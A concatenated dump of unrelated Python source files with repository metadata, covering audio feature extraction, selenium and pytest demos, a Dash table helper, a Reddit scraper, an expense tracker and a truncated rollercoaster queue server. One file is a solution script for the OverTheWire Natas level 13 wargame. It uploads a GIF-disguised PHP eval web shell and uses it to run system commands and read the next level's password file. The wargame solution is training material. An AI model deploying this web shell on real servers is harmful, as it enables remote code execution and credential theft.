xP = numpy.random.normal(0.0, 1.0, N) # samples from P
xQ = numpy.random.normal(0.0, 2.0, N) # samples from Q
print '< obs(x) >_P: %f' % obs(xP).mean()
print '< obs(y) >_Q: %f' % obs(xQ).mean()
print '< obs(y) * P(y) / Q(y) >_Q: %f' % (obs(xQ) * P(xQ) / Q(xQ)).mean()
| true |
434299119fdc0807a3562c580d5538c3072cdf20 | Python | TailoredAccessTeam/wargames | /natas/natas/level13.py | UTF-8 | 1,863 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python
# coding: utf-8
from requests.auth import HTTPBasicAuth
import requests
import sys
import re
def remove_str(the_string):
return the_string.replace("GIF29a", "")
def exploit(level13pass):
print "{+} Natas Level 13. Doing magic..."
try:
files = {"uploadedfile": "GIF29a<?php eval($_REQUEST[1]);"}
data = {"filename": "hax.php"}
r = requests.post(url="http://natas13.natas.labs.overthewire.org/", auth=HTTPBasicAuth('natas13', level13pass), files=files, data=data)
except Exception:
print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
return None
shell_path = re.findall("The file <a href=\"(.*?)\"", r.text)
shell_path = shell_path[0]
try:
data = {"1": "system('id;uname -a;whoami;pwd');"}
r = requests.post(url="http://natas13.natas.labs.overthewire.org/%s" %(shell_path), auth=HTTPBasicAuth('natas13', level13pass), data=data)
except Exception,e:
print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
print e
return None
print remove_str(r.text)
try:
data = {"1": "system('cat /etc/natas_webpass/natas14');"}
r = requests.post(url="http://natas13.natas.labs.overthewire.org/%s" %(shell_path), auth=HTTPBasicAuth('natas13', level13pass), data=data)
except Exception,e:
print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
print e
return None
return remove_str(r.text.strip())
#return None
def main(args):
if len(args) != 2:
sys.exit("use: %s level13password" %(args[0]))
level14pass = exploit(args[1])
if level14pass != None:
print "{$$} Level 14 Password is: %s" %(level14pass)
if __name__ == "__main__":
main(args=sys.argv)
| true |
0eef50b4705f91e644a2d8b8bf9d7c4104f6b4ac | Python | dhruboroy29/TestPythonProject | /audio_tests/melspec_librosa.py | UTF-8 | 3,213 | 2.59375 | 3 | [] | no_license | import librosa
import numpy as np
import soundfile as sf
import sys
import resampy
import os
import progressbar
CLASS_TO_INT = {
'bus': 0,
'busystreet': 1,
'office': 2,
'openairmarket': 3,
'park': 4,
'quietstreet': 5,
'restaurant': 6,
'supermarket': 7,
'tube': 8,
'tubestation': 9
}
def compute_logmelspecs(fname, sr, output_dir, flatten=False):
basename = os.path.basename(fname).split(os.extsep)[0]
output_path = os.path.join(output_dir, basename)
audio, sr_orig = sf.read(fname, dtype='float32', always_2d=True)
audio = audio.mean(axis=-1)
if sr_orig != sr:
audio = resampy.resample(audio, sr_orig, sr)
hop_size = 0.1
hop_length = int(hop_size * sr)
frame_length = sr * 1
audio_length = len(audio)
if audio_length < frame_length:
# Make sure we can have at least one frame of audio
pad_length = frame_length - audio_length
else:
# Zero pad so we compute embedding on all samples
pad_length = int(np.ceil(audio_length - frame_length)/hop_length) * hop_length \
- (audio_length - frame_length)
if pad_length > 0:
# Use (roughly) symmetric padding
left_pad = pad_length // 2
right_pad= pad_length - left_pad
audio = np.pad(audio, (left_pad, right_pad), mode='constant')
# Divide into overlapping 1 second frames
x = librosa.util.utils.frame(audio, frame_length=frame_length, hop_length=hop_length).T
# Get class label
class_label = np.array([CLASS_TO_INT[basename[:-2]]])
# Compute log-melspecs in each slice
logmelspec = []
for row in xrange(np.shape(x)[0]):
y=x[row]
#Compute log-melspecs on each window
n_fft = 2048
# n_win = 480
# n_hop = n_win//2
n_mels = 256
n_hop = 242
S = librosa.feature.melspectrogram(y, sr=sr, n_fft=n_fft, n_mels=n_mels, hop_length=n_hop).T
# Convert to log scale (dB). We'll use the peak power as reference.
log_S = librosa.logamplitude(S, ref_power=np.max)
# Reshape as a 1-D array
log_S = log_S.ravel()
# Concatenate class label as first element
log_S = np.concatenate((class_label,log_S))
logmelspec.append(log_S)
#np.savez_compressed(output_path, X=logmelspec, y=class_label)
np.save(output_path, logmelspec)
# Test read
read = np.load(output_path+'.npy')
print('ReadTest')
if __name__=="__main__":
#in_path = '/Users/Balderdash/Downloads/dcase2013/audio/fold1'
in_path = sys.argv[1]
target_sr = 48000
out_path = in_path.replace('audio', 'logmelspec_'+str(target_sr/1000)+'KHz')
if not os.path.exists(out_path):
os.makedirs(out_path)
audio_files = os.listdir(in_path)
print 'Input directory:', in_path, '\n'
bar = progressbar.ProgressBar(maxval=len(audio_files), \
widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])
bar.start()
n_iter=1
for file in audio_files:
compute_logmelspecs(os.path.join(in_path, file), target_sr, out_path)
bar.update(n_iter)
n_iter += 1
bar.finish() | true |
ae4143808b95e40e770703bc0ea9e390cbc146ed | Python | createnewdemo/istudy_test | /爬虫进阶/定位frame.py | UTF-8 | 797 | 2.8125 | 3 | [] | no_license | from selenium import webdriver
driver_path = r'E:\pycharm\chromediver\chromedriver.exe'
driver = webdriver.Chrome(executable_path=driver_path) # 可以使用driver操作浏览器了
driver.get('https://www.douban.com/')
driver.implicitly_wait(10)
# from selenium import webdriver
# driver = webdriver.Firefox()
# driver.switch_to.frame(0) # 1.用frame的index来定位,第一个是0
# driver.switch_to.frame("frame1") # 2.用id来定位
# driver.switch_to.frame("myframe") # 3.用name来定位
# driver.switch_to.frame(driver.find_element_by_tag_name("iframe")) # 4.用WebElement对象来定位
driver.switch_to.frame(driver.find_element_by_xpath('//*[@id="anony-reg-new"]/div/div[1]/iframe'))
tag = driver.find_element_by_xpath('//*[@id="account-form-remember"]')
tag.click()
print(tag)
| true |
d0268bceb5ec5037024c2f8bd510d589916f4825 | Python | pantelisantonoudiou/SAKE | /backend/create_user_table.py | UTF-8 | 2,031 | 3.484375 | 3 | [
"MIT"
] | permissive | ### ----------------- IMPORTS ----------------- ###
import pandas as pd
import numpy as np
### ------------------------------------------- ###
# Create dropdown column elements
dropdown_cols = ['Source', 'Search Function']
drop_options =[{'total_channels', 'file_name', 'channel_name', 'comment_text'},
{'contains', 'startswith', 'endswith', 'number', 'exact_match'}]
def dashtable(df):
"""
Convert df to appropriate format for dash datatable
PARAMETERS
----------
df: pd.DataFrame,
OUTPUT
----------
dash_cols: list containg columns for dashtable
df: dataframe for dashtable
drop_dict: dict containg dropdown list for dashtable
"""
dash_cols = [] # create dashtable column names
for x in df.columns :
temp_dict = {'name':x,'id':x}
if x in dropdown_cols:
temp_dict.update({'presentation': 'dropdown'})
# append to list
dash_cols.append(temp_dict)
# get dropdown contents for each column
drop_dict = {}
for i in range(len(dropdown_cols)): # loop through dropdown columns
drop_list = []
for x in drop_options[i]: # loop through column elements
drop_list.append({'label': x, 'value': x})
drop_dict.update({dropdown_cols[i]:{'options': drop_list, 'clearable':False}}) # append to dict
return dash_cols, df, drop_dict
def add_row(df):
"""
Add one row to dataframe
PARAMETERS
----------
df: pd.DataFrame,
OUTPUT
----------
df: pd.DataFrame, with one added row
"""
a = np.empty([1, len(df.columns)], dtype = object) # create empty numpy array
a[:] = '' # convert all to nans
a[0][-1]='all'
append_df = pd.DataFrame(a, columns = df.columns) # create dataframe
df = df.append(append_df, ignore_index=True) # append dataframe
return df
if __name__ == '__main__':
df = pd.read_csv('example_data/default_table_data.csv')
dash_cols, df, drop_dict = dashtable(df)
print(drop_dict) | true |
12f31ac586e8456040b015c93dd558678a9c1a83 | Python | faizan352/Ecommers_selenium_Project | /testCases/test_login.py | UTF-8 | 1,210 | 2.640625 | 3 | [] | no_license | import pytest
from selenium import webdriver
from pageObjects.LoginPage import LoginPage
class Test_001_Login:
baseURL = "https://admin-demo.nopcommerce.com/"
username = "admin@yourstore.com"
password = "admin"
def test_homePageTitle(self, setup):
self.driver = setup
self.driver.get(self.baseURL)
act_title = self.driver.title
if act_title == "Your store. Login":
assert True
self.driver.close()
else:
self.driver.save_screenshot(".\\Screenshots\\" + "test_homePageTitle.png")
self.driver.close()
assert False
def test_login(self, setup):
self.driver = setup
self.driver.get(self.baseURL)
lp = LoginPage(self.driver)
lp.setUserName(self.username)
lp.setpassword(self.password)
lp.clickLogin()
act_title = self.driver.title
if act_title == "Dashboard / nopCommerce administration":
assert True
self.driver.close()
else:
self.driver.save_screenshot(".\\Screenshots\\" + "test_login.png")
self.driver.close()
assert False
if __name__ == '__main__':
pytest.main() | true |
eacea05731d5c3c5c7121ab02751cba767695605 | Python | jeecha/pytest-intro | /parametrize/test_parametrize.py | UTF-8 | 371 | 3.453125 | 3 | [] | no_license | import pytest
def sum(a, b):
return a + b
# use pytest.mark.parametrize to provide multiple sets of arguments
# to the test method
@pytest.mark.parametrize("a, b, expected", [(2, 5, 7), (10, 20, 30)])
def test(a, b, expected):
# test method will be called twice with:
# a=2, b=5, expected=7
# a=10, b=20, expected=30
assert sum(a, b) == expected
| true |
7a9878611fad4267647a1a5173068e60aa3191e2 | Python | AnlaAnla/Python_priject | /untitled8/LeafItem/Flops.py | UTF-8 | 1,857 | 2.8125 | 3 | [] | no_license | import tensorflow.keras as keras
from tensorflow.keras import Model, Input, Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout
from keras_flops import get_flops
# build model
# build model
# inp = Input((32, 32, 1))
# x = Conv2D(32, kernel_size=(3, 3), activation="relu")(inp)
# x = MaxPooling2D(pool_size=(2, 2))(x)
# x = Flatten()(x)
# x = Dense(128, activation="relu")(x)
# out = Dense(10, activation="softmax")(x)
# model = Model(inp, out)
# # build model
# build model
# inp = Input((32, 32, 1))
IMAGE_SIZE = (150, 150)
classes = 16
model_alex = keras.Sequential(name='AlexNet_03')
model_alex.add(keras.layers.InputLayer(input_shape=IMAGE_SIZE + (3,)))
model_alex.add(
Conv2D(64, (11, 11), strides=(4, 4), padding='valid', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
model_alex.add(
Conv2D(150, (5, 5), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
# model_alex.add(
# Conv2D(192, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
# model_alex.add(
# Conv2D(192, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
# model_alex.add(
# Conv2D(150, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
model_alex.add(Flatten())
model_alex.add(Dense(256, activation='relu'))
model_alex.add(Dense(128, activation='relu'))
model_alex.add(Dense(classes, activation='softmax'))
print(model_alex.summary())
flops = get_flops(model_alex, batch_size=1)
print(f"flops: {flops / 10 ** 9:.03} g")
| true |
3b0a6d7ee252f0a62e3c3b65d97449b829c79187 | Python | cafaray/atco.de-fights | /isBeautifulString.py | UTF-8 | 799 | 3.453125 | 3 | [] | no_license | import re
def isBeautifulString(inputString):
orderedString = sorted(inputString)
inputString = ""
for c in orderedString:
inputString += c
#inputString = str(inputString)
print(inputString)
count = len(inputString)
esPrimero = True
previo = ''
for caracter in range(ord('a'),ord('z')+1): #inputString:
char = chr(caracter)
print(char)
pattern = re.compile(char)
res = pattern.findall(inputString)
#print(res)
if esPrimero is False:
if count < len(res):
return False
else:
count = len(res)
previo = caracter
else:
count = len(res)
previo = caracter
esPrimero = False
return True | true |
98c3da574f5eedfb3d62b0157ae94cef16364a70 | Python | tuffing/adventofcode2018 | /scaffolding/standard.py | UTF-8 | 522 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python3
import sys
sys.path.append('../')
from scaffolding import common
class Solution(object):
#inputNumbers = common.pullNumbersFromList(inputList, True) #True = include signs, False: all numbers are positive
def __init__(self):
pass
def solution(self, inputList):
print('Solution Here')
return 1
def run(self):
inputList = common.loadInput('input.txt', True) #True = split, False = string
print('Advent Day: X')
self.solution(inputList)
if __name__ == '__main__':
Solution().run()
| true |
ddd8253745e8d51438997c0d54383d98c0b5e73f | Python | jessicagamio/longest_substring | /longest_substring.py | UTF-8 | 1,445 | 3.65625 | 4 | [] | no_license | import unittest
def lengthOfLongestSubstring(s):
substring_dictionary = {}
substring = ""
max_length = None
if s == "":
return 0
if len(s) == 1:
return 1
else:
for char in s:
if char not in substring:
substring += char
else:
substring_dictionary[substring] = len(substring)
if char == substring[-1]:
substring = char
else:
# add remaining substring after repeated char with new char
index = substring.index(char)
substring = substring[index+1:] + char
substring_dictionary[substring] = len(substring)
for item in substring_dictionary:
if max_length == None:
max_length = substring_dictionary[item]
elif substring_dictionary[item] > max_length:
max_length = substring_dictionary[item]
return max_length
class TestFunction(unittest.TestCase):
def test_meth(self):
self.assertEqual(lengthOfLongestSubstring("pwwkew"),3)
self.assertEqual(lengthOfLongestSubstring(" "),1)
self.assertEqual(lengthOfLongestSubstring("ae"),2)
self.assertEqual(lengthOfLongestSubstring("dvdf"),3)
self.assertEqual(lengthOfLongestSubstring("anviaj"),5)
if __name__ == "__main__":
unittest.main()
| true |
c3e928de0b457de3299947bd8391130cd4d6857b | Python | RSarmento/tcc | /pre_process/controller/analyser.py | UTF-8 | 550 | 3.65625 | 4 | [] | no_license | def analyse_classes(classes_novas, classes_existentes):
iguais = 0
diferentes = 0
dados_iguais = set()
for classe in classes_novas:
for classe_existente in classes_existentes:
if classe.lower() == classe_existente.lower():
iguais += 1
dados_iguais.add(classe)
print('%s e %s' % (classe, classe_existente))
else:
diferentes += 1
print('Existem %s classes iguais e %s classes diferentes' % (iguais, diferentes))
print(dados_iguais)
| true |
ff2d95b151f0ffec36ef272213b7f052131a5c88 | Python | LazyMammal/GetTopCommentsReddit | /get_all_posts.py | UTF-8 | 1,053 | 2.671875 | 3 | [] | no_license | import time
import praw
# generator function for subreddit posts (top + new + hot + gilded)
# note: timestamp search is no longer part of reddit api
# note: yielded posts are unique (duplicates are discarded)
def get_all_posts(subreddit):
reddit = praw.Reddit(site_name='get_top_comments',
user_agent='Get all subreddit posts, by LazyMammal v 0.1') # , log_requests=1)
sr = reddit.subreddit(subreddit)
post_limit = 1000
post_id_cache = set()
for gen in [sr.top, sr.new, sr.hot, sr.gilded]:
for post in gen(limit=post_limit):
if post.id not in post_id_cache:
post_id_cache.add(post.id)
yield post
def main():
# debug output
for post in get_all_posts('saved'): # /r/saved is a small subreddit
if isinstance(post, praw.models.reddit.submission.Submission):
print post
for k in post.__dict__.keys():
print '\t', k, str(post.__dict__[k])
break
if __name__ == "__main__":
main()
| true |
276df1dae0fa6e3e68c0e34635cfb3d8ccad5222 | Python | diunko/awesome-algorithms-course | /00-ti-1260/take2.py | UTF-8 | 388 | 2.859375 | 3 | [] | no_license |
import sys
NN, = [int(i) for i in sys.stdin.readline().strip().split()]
D0 = [0, 1, 1, 2, 4, 6, 9, 14]
D = [None] * 100
for i in xrange(len(D0)):
D[i] = D0[i]
M = len(D0)
def gen(N):
global M
if N < M:
return D[N]
else:
g = gen(N-1) + gen(N-3) + 1
D[M] = g
M+=1
return g
def main(N):
for i in xrange(1, N):
gen(i)
return gen(N)
print main(NN)
| true |
5300cc28ee2bd1ca597449827865bdf182fc96b9 | Python | Cedric9352/Core-Python-Programming-Exercise | /6th/deblank.py | UTF-8 | 242 | 3.8125 | 4 | [] | no_license | str_input = raw_input('Enter a string: ')
str_list = list(str_input)
while True:
if(str_list[0] == ' '):
str_list.pop(0)
elif(str_list[-1] == ' '):
str_list.pop()
else:
break
print ''.join(str_list)
| true |
25acc19fc06621b43ca3af4b267c0739e8acff81 | Python | sammienjihia/data_science | /iter_tools.py | UTF-8 | 1,066 | 4.25 | 4 | [] | no_license | # The zip() function, takes any number of iterables as it's function and returns tuples of it's
# iterable elements
arg1 = list(zip([1,2,3,4], ['a','b','c','d'], ['nyef', 24, 'bb', 'a'], [1,'q', 'op'], [1]))
print(arg1)
arg2 = list(zip([1,2,3,4], ['a','b','c','d'], ['nyef', 24, 'bb', 'a']))
print(arg2)
# NB returns the iterator with the next function hence the number of elements in the out put will always be equal the
# next iterator meaning the last iterator
# The map function works by calling the iter function on it's second argument advancing it's iterator with next until
# the iterator is exhausted, and applying the function passed to its first argument to the value returned by next()
# at each step
arg3 = list(map(len, ['cat', 'doggy', 'kaleodoscope']))
print(arg3)
"""
Since iterators are iterable, you can compose zip() and map() to produce an iterator over combinations of elements
in more than one iterable. For example, the following sums corresponding elements of two lists:
"""
arg4 = list(map(sum,zip([1,3,5,7],[3,4,6,7])))
print(arg4) | true |
162b8d4fa7592a38c41b8299a7358bdc27f9d9fd | Python | sam-hunt/hash-backup | /src/logger.py | UTF-8 | 2,560 | 3.328125 | 3 | [] | no_license | """
Create a log file handler which logs message to both the screen and the keyboard.
The logfile can be either a rotating logfile or continuous.
"""
import time
import logging
import logging.handlers
# import os.path
__author__ = 'Giovanni Moretti'
PROGRAM_NAME = "myBackup"
# LOG_FILENAME = os.path.join(os.path.dirname(os.path.abspath(__file__)), PROGRAM_NAME + '.log')
CONSOLE_LOG_LEVEL = logging.ERROR # Only show errors to the console
FILE_LOG_LEVEL = logging.INFO # but log info messages to the logfile
logger = logging.getLogger(PROGRAM_NAME)
logger.setLevel(logging.DEBUG)
# ====================================================================================
# FILE-BASED LOG
# Create formatter and add it to the handlers
logger.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# formatter = logging.Formatter('%(levelname)s - %(message)s')
logger.fh, logger.ch = None, None
def add_handling(log_filename):
# LOGFILE HANDLER - SELECT ONE OF THE FOLLOWING TWO LINES
logger.fh = logging.FileHandler(log_filename) # Continuous Single Log
# fh = logging.handlers.RotatingFileHandler(LOG_FILENAME, backupCount=5) # Rotating log
logger.fh.setLevel(FILE_LOG_LEVEL)
logger.fh.setFormatter(logger.formatter)
logger.addHandler(logger.fh)
# logger.handlers[0].doRollover() # Roll to new logfile on application start
# Add timestamp
# logger.info('\n---------\nLog started on %s.\n---------\n' % time.asctime())
# =================================================================================
# CONSOLE HANDLER - can have a different log-level and format to the file-based log
logger.ch = logging.StreamHandler()
logger.ch.setLevel(CONSOLE_LOG_LEVEL)
logger.formatter = logging.Formatter('%(message)s') # simpler display format
logger.ch.setFormatter(logger.formatter)
logger.addHandler(logger.ch)
if __name__ == '__main__':
# =================================================================================
# In APPLICATION CODE, use whichever of the following is appropriate:
logger.debug('debug message ' + time.ctime() )
logger.info('info message ' + time.ctime() )
# logger.warn('warn message')
# logger.error('error message')
# logger.critical('critical message')
# =================================================================================
# Test Logger
f = open("myBackup.log")
s = f.read()
print(s)
| true |
9658becc733e65c824a16eed27fe95fef48159bd | Python | gill104/AlvaradoExpences | /DemoAlvarado.py | UTF-8 | 7,621 | 2.859375 | 3 | [] | no_license | '''
*Created by: Gilbert Salazar
*Description: To provide a log for all expences and sales for 'Alvarado's Bakery'
*
*Implement Dictionary properly to load and save data.
*create a class for menuVendor/MenuStart/MenuEnd
*Fix errors due to moving expence instance to proper location
*deal with memory issue (delete the instance made)
*general cleanup of definition
*
'''
import sys
import os
import time
import pickle
#import GUI as gui
#simple class that stores user information into a list format
class ExpenceStorage:
def __init__(self):
self.__InvoiceNumber = 'N/A'
self.__Date = 'N/A'
self.__Vendor = 'N/A'
self.__Product = 'N/A'
self.__PayMethod = 'N/A'
self.__Notes = 'N/A'
self.__PayAmount = 0.0
#self.name = ''
#self.value = 0.0
#might not need this list
self.__Data = [
self.__InvoiceNumber,
self.__Date,
self.__Vendor,
self.__Product,
self.__PayMethod,
self.__PayAmount,
self.__Notes
]
def setInvoiceNumber(self, invoiceNum):
self.__Data[0] = invoiceNum
def setDate(self, date):
self.__Data[1] = date
def setVendor(self, vendor):
self.__Data[2] = vendor
def setProduct(self, product):
self.__Data[3] = product
def setPayMethod(self, method):
self.__Data[4] = method
def setPayAmount(self, amount):
self.__Data[5] = amount
def setNotes(self, notes):
self.__Data[6] = notes
def getInvoiceNumber(self):
return self.__Data[0]
def getDate(self):
return self.__Data[1]
def getVendor(self):
return self.__Data[2]
def getProduct(self):
return self.__Data[3]
def getPayMethod(self):
return self.__Data[4]
def getPayAmount(self):
return self.__Data[5]
def getNotes(self):
return self.__Data[6]
#saves user information into an external file
def saveToFile(self, fileName):
file = open(fileName,'a+')
file.write(
self.__Data[0] + '\n' +
self.__Data[1] + '\n' +
self.__Data[2] + '\n' +
self.__Data[3] + '\n' +
self.__Data[4] + '\n' +
self.__Data[5] + '\n' +
self.__Data[6] + '\n')
file.close()
print('Data Saved...press [any button to continue]')
file = open('usrFile.txt','a+')
file.write(
self.__Data[0] + '\t' +
self.__Data[1] + '\t' +
self.__Data[2] + '\t' +
self.__Data[3] + '\t' +
self.__Data[4] + '\t' +
self.__Data[5] + '\t' +
self.__Data[6] + '\n')
file.close()
#input()
os.system('clear')
#with open('data.pickle','wb') as f:
# pickle.dump(self.__Data,f,pickle.HIGHEST_PROTOCOL)
def getData(self):
print(self.__Data)
return self.__Data
def printList(self):
print(self.__Data)
with open('data.pickle', 'rb') as f:
while(True):
try:
self.readData = pickle.load(f)
print('Read Data: ' , self.readData)
except EOFError:
break
'''class SalesInformation():
def __init__(self):
self.__Total = 0.0
self.__CardTotal = 0.0
self.__CashTotal = 0.0
self.__EbtTotal = 0.0
def setTotal(self, total):
self.__Total = total
def setCardTotal(self, cardTotal):
self.__CardTotal = cardTotal
def setCashTotal(self, cashTotal):
self.__CashTotal = cashTotal
def setEbtTotal(self, ebtTotal):
self.__EbtTotal = ebtTotal
def getTotal(self):
return self.__Total
def getCardTotal(self):
return self.__CardTotal
def getCashTotal(self):
return self.__CashTotal
def getEbtTotal(self):
return self.__EbtTotal
def saveToFile(self, fileName):
file = open(fileName, 'a+')
file.write(
self.__Total + '\n' +
self.__CardTotal + '\n' +
self.__CashTotal + '\n' +
self.__EbtTotal + '\n'
)
file.close()
print('Data saved...press [Any button to continue]')
input()
os.system('clear')
'''
class MenuVariableHolder():
def __init__(self):
self.__MenuVendor = 'N/A'
self.__MenuStartDate = 'N/A'
self.__MenuEndDate = 'N/A'
self.__MenuPayType = 'N/A'
def setMenuVendor(self, menuVendor):
self.__MenuVendor = menuVendor
def setMenuStartDate(self,menuStartDate):
#print('here: ', menuStartDate)
if(menuStartDate != ''):
self.__MenuStartDate = menuStartDate
else:
self.__MenuStartDate = 'N/A'
def setMenuEndDate(self, menuEndDate):
if(menuEndDate != ''):
self.__MenuEndDate = menuEndDate
else:
self.__MenuEndDate = 'N/A'
def setMenuPayType(self, menuPayType):
self.__MenuPayType = menuPayType
def getMenuVendor(self):
return self.__MenuVendor
def getMenuStartDate(self):
return self.__MenuStartDate
def getMenuEndDate(self):
return self.__MenuEndDate
def getMenuPayType(self):
return self.__MenuPayType
class DictionaryHash():
def __init__(self):
self.__d = {}
self.__l = []
def setDictionary(self, key, value):
print('key: ', key)
print('Value: ', value, '\n')
if(key not in self.__d.keys()):
self.__d[key] = []
self.__d[key].append(value)
'''self.__d = {}
self.__d[key] = []
print('created new empty List for ', key, '\n')
print('should be empty: ', self.__d)
self.__d[key].append(value)
print('newItem Added: ' , self.__d, '\n')'''
else:
self.__d.setdefault(key, [])
self.__d[key].append(value)
def getDictionary(self):
return self.__d
def saveDictionary(self):
with open('Diction.data.pickle','wb') as f:
print('Im saving this: ' , self.__d)
pickle.dump(self.__d,f,pickle.HIGHEST_PROTOCOL)
def loadDictionary(self):
try:
with open('Diction.data.pickle', 'rb') as f:
#while(True):
try:
self.__d = pickle.load(f)
print('Reading Dictionary')
for k,v in self.__d.items():
print('k: ', k)
print('v: ', v)
except EOFError:
print('blaj')
except FileNotFoundError:
file = open('Diction.data.pickle','a+')
file.close()
def selectVendor(self):
vendorList = ['N/A']
for k,v in self.__d.items():
print("Keys: ", k)
vendorList.append(k)
return vendorList
def loadMemory():
d = DictionaryHash()
d.loadDictionary()
mvh = MenuVariableHolder()
return(d,mvh) | true |
e4f3f070b029bcad3d3108c1fb2103506da255c0 | Python | Tr33-He11/HIK_FaceDetec_DL_System | /Configuration/config.py | UTF-8 | 1,108 | 2.515625 | 3 | [] | no_license | # coding=utf-8
import configparser
import os
# rootdir = os.getcwd() # 获取配置文件的绝对路径
# rootconf = os.path.join(rootdir, 'config.ini') # 连接路径和相应文件
# print(rootconf)
# 自己在这里犯了一个错误,config.ini应该放在总工程目录下
config = configparser.ConfigParser()
config.read('/home/douxiao/Desktop/HIK_FaceDetec_DL_System/config.ini') # 读取配置文件中的配置信息
user = config.get("accountConf", "user")
password = config.get("accountConf", "password")
host = config.get("ipConf", "host")
port = config.get("ipConf", "port")
def get_rtsp():
# 海康威视摄像头的RSTP地址
# 海康威视摄像头采用的是RTSP协议 RTSP 实时串流协议(Real time stream protocol,RTSP)
# 是一种网络应用协议,专为娱乐和通信系统使用,以控制流媒体服务器。
rtsp = "rtsp://%s:%s@%s/Streaming/Channels/1" % (user, password, host)
print(rtsp)
return rtsp
def get_ip():
return host
def get_port():
return port
if __name__ == "__main__":
get_rtsp()
get_ip()
get_port() | true |
e07c3b3b6fb00b5521ed3f996ee0f386b2a67644 | Python | aleksda/FYS4150 | /Project3/script/plot_exp.py | UTF-8 | 825 | 3.515625 | 4 | [] | no_license | # Importing pandas for data analysis, numpy for numerical computations
# matplotlib and seaborn for data visualization
import pandas as pd, numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import os # To change directory
os.chdir('/home/aleksandar/Desktop/FYS4150/Project3/')
# Making the plot nicer
sns.set() # Dont' have seaborn? Remove everything with sns. from the code
sns.color_palette("husl", 8)
plt.style.use("bmh")
# The wave function
def func_to_plot(x):
return np.exp(-2 * np.abs(x))
# Grid points
r = np.linspace(-5,5, 1001)
# Plotting
plt.plot(r, func_to_plot(r), 'purple', label='$\\psi(r)$')
plt.title('Wave Function')
plt.legend(loc='best')
plt.xlabel('$r$')
plt.ylabel('$\\psi(r) = e^{-\\alpha |r|}$')
plt.savefig('plots/wave_func.jpg')
plt.savefig('plots/wave_func.png')
plt.show()
| true |
68877ed3bfe99bad9024029233d30c3d0191a25f | Python | lucasvanmeter/connect4 | /Player.py | UTF-8 | 592 | 3.75 | 4 | [] | no_license | #!/usr/bin/python3
#We want a generic class of players to play the game. We will implement both a human and bot to play.
class Player:
def __init__(self):
pass
#should return key for where to play
def play(self,board):
raise Exception('Unimplemented')
#Human players will be asked to make a move when it is their turn to play.
class Human(Player):
def getInput(self):
try:
return int(input('Where do you want to play? ---> '))
except ValueError:
print("I didn't catch that, try again:")
return self.getInput()
def play(self,board):
return self.getInput()
| true |
604f8c368f91a70d6a563ba3a855dae29285b038 | Python | Stepankazak/repo-for-writes | /work6.py | UTF-8 | 276 | 3.234375 | 3 | [] | no_license | a = int(input('Введите нач. км: '))
b = int(input('Введите конец км:'))
day = 1
while b - a > 0:
a = a + (a * 0.1)
day += 1
print(f'На { day }-й день спортсмен достиг результата-не менее { b }км')
| true |
1d8b5c689efedce687b27308345edd63d74cdf22 | Python | arashmostafaee/rollercoaster | /server.py | UTF-8 | 3,960 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python
import socket as sk
import json
import time
HOST = '10.22.8.155'
PORT = 12345
WAGON_SIZE = 1
s = sk.socket(sk.AF_INET, sk.SOCK_DGRAM)
s.bind((HOST, PORT))
passengerQueue = []
wagonQueue = []
def addPassenger(address): # add an IP + port to our passenger queue
passengerQueue.append(address)
s.sendto("You entered the passenger queue".encode(), address)
print("Added the user to the passenger queue, we have ", str(len(passengerQueue)), " passengers in queue")
def addWagon(address): # add an ip + port to our wagon queue
wagonQueue.append(address)
s.sendto("You entered the wagon queue".encode(), address)
print("Added the user to the wagon queue, we have ", str(len(wagonQueue)), " wagons in queue")
def checkAvailableRide(): # check if we have a wagon and enough passengers for it, send away the wagon with the passengers
# do we have a wagon and enough people for it?
print("Checking if there is a wagon and enough passengers for it")
if ((len(passengerQueue) >= WAGON_SIZE) and (len(wagonQueue) >= 1)):
currentWagon = wagonQueue.pop(0) # pop wagon from queue
currentWagon = currentWagon[0] # retrieve ip from tuple
tcp_socket_wagon = sk.socket(sk.AF_INET, sk.SOCK_STREAM)
tcp_socket_wagon.connect((currentWagon, 1337)) # open TCP connection with wagon
print("Found enough passengers and a wagon, now messaging the passengers and the wagon")
# while True:
# tcp_socket_wagon.send(('I am sending your passengers now, are you ready?').encode())
# tcp_response_msg = tcp_socket_wagon.recv(50)
# print("waiting to see if wagon is ready")
# if tcp_response_msg.decode() == "I am ready to receive passengers":
# print("Wagon is ready to receive the passengers, starting to send them.")
# time.sleep(1)
# break
passengerListForWagon = []
for i in range(WAGON_SIZE): # tell each passenger the wagon ip, and tell wagon each passenger ip
currentPassenger = passengerQueue.pop(0) # pop passenger from queue
# x=currentPassenger
currentPassengerIP = currentPassenger[0] # retrieve ip from tuple
passengerListForWagon.append(currentPassengerIP)
# tcp_socket_wagon.send(('This is the ip of a passenger,'+str(currentPassenger)).encode())
s.sendto(('This is the ip of your wagon,' + str(currentWagon)).encode(), currentPassenger)
print("Passenger number ", str(i + 1), " is now informed.")
jsonData = json.dumps(passengerListForWagon)
tcp_socket_wagon.send((jsonData).encode())
print("The wagon is now informed about all passengers.")
tcp_socket_wagon.close()
print("The ride is now planned!")
else:
print("There is currently not enough passengers or wagons in queue..")
def sendAnotherPassenger(address):
newPassenger = passengerQueue.pop(0) # pop first passenger in queue
s.sendto(newPassenger[0].encode(), address)
print("Sent a new passenger to wagon with disconnected passenger.")
def handleClientMessage(msg, address):
# if-else statement to handle the message received
if (msg == "I want to join passenger queue"):
addPassenger(address)
elif (msg == "I want to join wagon queue"):
addWagon(address)
elif (msg == "I need one more passenger"):
sendAnotherPassenger(address)
print("Server started!")
while 1:
